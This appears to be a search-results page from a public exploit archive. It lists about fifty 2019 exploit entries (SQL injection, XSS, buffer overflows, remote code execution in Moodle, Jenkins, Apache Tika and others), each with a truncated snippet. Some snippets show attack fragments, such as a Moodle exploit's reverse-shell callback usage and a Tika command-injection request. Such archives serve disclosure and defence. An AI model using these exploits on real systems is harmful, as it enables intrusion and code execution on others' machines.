47904 matches found
Rails 5.2.1 - Arbitrary File Content Disclosure
''' Exploit Title: File Content Disclosure on Rails Date: CVE disclosed 3/16 today's date is 3/20 Exploit Author: NotoriousRebel Vendor Homepage: https://rubyonrails.org/ Software Link: https://github.com/rails/rails Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2,...
DVD X Player 5.5.3 - '.plf' Buffer Overflow
!/usr/bin/env python Exploit Title: DVD X Player 5.5.3 Buffer Overflow Date: 20.03.2019 Exploit Author: Paolo Perego - [email protected] Vendor Homepage: http://www.dvd-x-player.com Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe Version: 5.5.3.8 and above...
Netartmedia Vlog System - 'email' SQL Injection
Exploit Title: Netartmedia Vlog System - 'email' SQL Injection Date: 20.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/vlogsystem/ Demo Site: https://www.phpscriptdemos.com/vlogs/ Version: Lastest Tested on: Kali Linux CVE: N/A ----- PoC: SQLi ----- Request...
uHotelBooking System - 'system_page' SQL Injection
Exploit Title: uHotelBooking System - 'systempage' SQL Injection Date: 21.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.hotel-booking-script.com Demo Site: https://www.hotel-booking-script.com/demo/ Version: Lastest Tested on: Kali Linux CVE: N/A Description: uHotelBookin...
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery
Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery CSRF Date: 14/01/2019 Exploit Author: Kumar Saurav Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/ Vendor: ChinaMobile Category: Hardware Version:...
Netartmedia Deals Portal - 'Email' SQL Injection
Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection Date: 20.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/dealsportal/ Demo Site: https://www.phpscriptdemos.com/deals/i Version: Lastest Tested on: Kali Linux CVE: N/A ----- PoC: SQLi -----...
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access Control Date: 14/01/2019 Exploit Author: Kumar Saurav Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/ Vendor: ChinaMobile Category: Hardware Version: GPN2.4P21-C-C...
Netartmedia PHP Business Directory 4.2 - SQL Injection
Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.phpbusinessdirectory.com/ Demo Site: https://www.bizwebdirectory.com/ Version: 4.2 Tested on: Kali Linux CVE: N/A ----- PoC SQLi ----- Request:...
Netartmedia PHP Dating Site - SQL Injection
Exploit Title: Netartmedia Php Dating Site - SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/datingsite/ Demo Site: https://www.phpscriptdemos.com/dating/ Version: Lastest Tested on: Kali Linux CVE: N/A Description: PHP Dating Site is ...
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/propertyagency/ Demo Site: https://www.phpscriptdemos.com/agency/ Version: 4.0 Tested on: Kali Linux CVE: N/A Description:PHP Real...
NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow
Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow Date: 2019-03-19 Vendor Homepage: http://netsharewatcher.nsauditor.com Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatchersetup.exe Exploit Author: Peyman Forouzan Tested Version: 1.5.8.0 Tested on: Windows XP...
Netartmedia Jobs Portal 6.1 - SQL Injection
Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/jobsportal/ Demo Site: https://www.ittjobs.com/ Version: 6.1 Tested on: Kali Linux CVE: N/A ----- PoC SQLi ----- Request:...
Netartmedia PHP Car Dealer - SQL Injection
Exploit Title: Netartmedia PHP Car Dealer- SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/autodealer/ Demo Site: https://www.phpscriptdemos.com/autodealer/ Version: Lastest Tested on: Kali Linux CVE: N/A Description:The PHP Car Dealer...
202CMS v10beta - Multiple SQL Injection
=========================================================================================== Exploit Title: 202CMS - 'loguser' SQL Inj. Dork: N/A Date: 20-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://sourceforge.net/projects/b202cms/ Software Link:...
Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML
!-- Windows: Windows: IE11 VBScript execution policy bypass in MSHTML Platform: Windows 10 1809 not tested earlier Class: Security Feature Bypass Summary: MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which...
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService
There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService. It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback from the same BindingSet, which...
Netartmedia PHP Mall 4.1 - SQL Injection
Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/mall/ Demo Site: https://www.phpscriptdemos.com/mall/ Version: 4.1 Tested on: Kali Linux CVE: N/A Description: PHP Mall is one of the...
Google Chrome < M73 - MidiManagerWin Use-After-Free
MidiManagerWin uses a similar instanceid mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. However, this instanceid is an int, and there is no check that it hasn't overflowed, unlike i...
eNdonesia Portal 8.7 - Multiple Vulnerabilities
=========================================================================================== Exploit Title: eNdonesia Portal 'banners.php' SQL Inj. Dork: N/A Date: 19-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://www.endonesia.org/ Software Link:...
MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting
Exploit Title: MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting Date: 3/8/2019 Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=1231 Version: 1.32 Tested on: Ubuntu 18.04 CVE: CVE-2019-9650 1. Description: This plugin...
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject
Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com screenshot attached, but can load a swf from any domain and also the PoC itself can be hosted...
Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter
There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently. See the comment in the code: ExtensionsGuestViewMessageFilter::ExtensionsGuestViewMessageFilter DCHECKCURRENTLYONBrowserThread::IO; // This map is...
Advanced Host Monitor 11.92 beta - Local Buffer Overflow
!/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow EggHunter Date: 2019-03-18 Author: Peyman Forouzan Tested Against: Winxp SP2...
Gila CMS 1.9.1 - Cross-Site Scripting
Exploit Title: Gila CMS search Cross Site Scripting Google Dork: intext:"Powered By Gila CMS" Date: 11.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://gilacms.com Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip Demo Site: https://gilacms.com/demo/ Version:...
Microsoft VBScript - VbsErase Memory Corruption
r eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44 eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 VBSCRIPT!VbsErase+0x5a: 6e0fc9fa 8b3e mov edi,dword ptr esi ds:002b:13371337=????????...
Google Chrome < M73 - FileSystemOperationRunner Use-After-Free
There's a comment in FileSystemOperationRunner::BeginOperation OperationID FileSystemOperationRunner::BeginOperation std::uniqueptr operation OperationID id = nextoperationid++; // TODOhttps://crbug.com/864351: Diagnostic to determine whether OperationID // wrap-around is occurring in the wild...
libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons
When libseccomp compiles filters for 64-bit systems, it needs to split 64-bit comparisons into 32-bit comparisons because classic BPF can't operate on 64-bit values directly. libseccomp offers both bitwise comparisons NE, EQ, MASKEDEQ and arithmetic comparisons LT, LE, GE, GT. Bitwise comparisons...
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Jenkins ACL Bypass and Metaprogramming RCE', 'Description' = %q This module exploits a vulnerability in Jenkins dynamic routing to bypass the...
Netartmedia Real Estate Portal 5.0 - SQL Injection
Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/realestate/ Demo Site: https://www.phpscriptdemos.com/realestate/ Version: 5.0 Tested on: Kali Linux CVE: N/A Description: The...
Netartmedia Event Portal 2.0 - 'Email' SQL Injection
Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/eventportal/ Demo Site: https://www.phpscriptdemos.com/events/ Version: 2.0 Tested on: Kali Linux CVE: N/A Description: Event Portal ...
BMC Patrol Agent - Privilege Escalation Code Execution Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'zlib' class MetasploitModule Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Powershell @deflater = nil...
TheCarProject 2 - Multiple SQL Injection
=========================================================================================== Exploit Title: TheCarProject v2 - 'manid' SQL Inj. Dork: N/A Date: 17-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://thecarproject.org/ Software Link:...
WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service
Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit Date: 16.03.2019 Vendor Homepage:http://www.winavi.com Software Link: http://www.winavi.com/user/download/WinAVIiPod3GPMP4PSPConverter.exe Exploit Author: Achilles Tested Version: 4.4.2 Tested on: Windows XP SP3 EN Windows 7...
WinMPG Video Convert 9.3.5 - Denial of Service
Exploit Title: WinMPG Video Convert Local Dos Exploit Date: 15.03.2019 Vendor Homepage:http://www.winmpg.com Software Link: http://www.winmpg.com/down/WinMPGVideoConvert.zip Exploit Author: Achilles Tested Version: 9.3.5 and older ones Tested on: Windows XP SP3 EN 1.- Run python code :WinMPG.py 2...
Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities
Exploit Title: Vembu Storegrid Web Interface 4.4.0 - Multiple Vulnerabilities Discovery Date: 2018-12-05 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://www.vembu.com/ Software Link : N/A Google Dork: N/A Version: 4.4.0 CVE : CVE-2014-10078,CVE-2014-10079 Description StoreGrid...
ICE HRM 23.0 - Multiple Vulnerabilities
=========================================================================================== Exploit Title: ICE HRM - ’ob’ SQL Inj. Dork: N/A Date: 14-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://icehrm.org Software Link: https://sourceforge.net/projects/icehrm/ Version: v23.0...
Mail Carrier 2.5.1 - 'MAIL FROM' Buffer Overflow
Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow Date: March 14, 2019 Exploit Author: Joseph McDonagh Vendor Homepage: N/A Software Link: N/A Version: Mail Carrier 2.5.1 Tested on: Windows Vista Home Basic SP2 CVE: None !/usr/bin/python This script started from PWK, Chapter 6 I a...
NetData 1.13.0 - HTML Injection
Author: Marcelo Vázquez aka s4vitar NetData v1.13.0 HTML Injection Vulnerability Exploit Title: NetData v1.13.0 HTML Injection Vulnerability Date: 2019-03-14 Exploit Author: Marcelo Vázquez aka s4vitar Collaborators: Victor Lasa aka vowkin Vendor Homepage: https://my-netdata.io/ Software Link:...
Laundry CMS - Multiple Vulnerabilities
=========================================================================================== Exploit Title: Laundry CMS clothcode SQL Inj. Dork: N/A Date: 09-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://laundry.rpcits.co.in/ Software Link: https://sourceforge.net/projects/laundr...
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) Arbitrary File Upload
!/usr/bin/env python Exploit Title: CMS Made Simple authenticated arbitrary file upload in Showtime2 module Date: March 2019 Exploit Author: Daniele Scanu @ Certimeter Group Vendor Homepage: https://www.cmsmadesimple.org/ Software Link: http://viewsvn.cmsmadesimple.org/listing.php?repname=showtim...
Moodle 3.4.1 - Remote Code Execution
php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the teacher Make sure you're running a netcat listener on the...
Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)
history.pushState'', 't00t', 'index.php' input type="hidden" name="dbTableU...
FTPGetter Standard 5.97.0.177 - Remote Code Execution
Exploit Title: FTPGetter Standard - v.5.97.0.177 Remote Code Execution Date: 05/03/2019 Exploit Author: https://github.com/w4fz5uck5 | @w4fz5uck5 Vendor Homepage: https://www.ftpgetter.com Software Link: https://www.ftpgetter.com/ftpgettersetup.exe Version: v.5.97.0.177 Tested on: Windows 7 x64 C...
Apache UNO / LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 API - Remote Code Execution
""" Exploit Title: Apache UNO API RCE Date: 2018-09-18 Exploit Author: sud0woodo Vendor Homepage: https://www.apache.org/ Software Link: https://www.openoffice.org/api/ Version: LibreOffice Version: 6.1.2 / OpenOffice 4.1.6 but really any version with the UNO API included Tested on: Ubuntu Mate...
Pegasus CMS 1.0 - 'extra_fields.php' Plugin Remote Code Execution
Exploit Title: Pegasus extrafields.php Plugin Remote Code Execution Date: 14 March 2019 Exploit Author: R3zk0n Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms Software Link: N/A Version: 1.0 Tested on: Linux CVE : N/A The Pegasus CMS is vulnerable to directory travaseral and Remote cod...
elFinder PHP Connector < 2.1.48 - 'exiftran' Command Injection (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'elFinder PHP Connector exiftran Command Injection', 'Description' = %q This module exploits a command injection vulnerability in elFinder version...
Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal
Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674 SIZE Directory Traversal Google Dork: N/A Date: 4/27/2019 Exploit Author: Kevin Randall Vendor Homepage: https://www.coreftp.com Software Link: http://www.coreftp.com/server/index.html Version: Firmware: CoreFTP Server FTP / SFTP Serv...
Microsoft Windows - '.reg' File / Dialog Box Message Spoofing
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt + ISR: ApparitionSec Vendor www.microsoft.com Product A file with the .reg file extension is a Registration file...
Apache Tika-server < 1.18 - Command Injection
Description: This is a PoC for remote command execution in Apache Tika-server. Versions Affected: Tika-server versions " print "Example: python CVE-2018-1335.py localhost 9998 calc.exe" else: host = sys.argv1 port = sys.argv2 cmd = sys.argv3 url = host+":"+strport+"/meta" headers =...
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting
Exploit Title: pfSense 2.4.4-p1 HAProxy Package 0.5914 - Stored Cross-Site Scripting Date: 13.02.2019 Exploit Author: Gionathan "John" Reale Vendor Homepage: https://www.pfsense.org Version: 2.4.4-p1/0.5914 Software Link: N/A Google Dork: N/A CVE:2019-8953 Introduction pfSense® software is a free...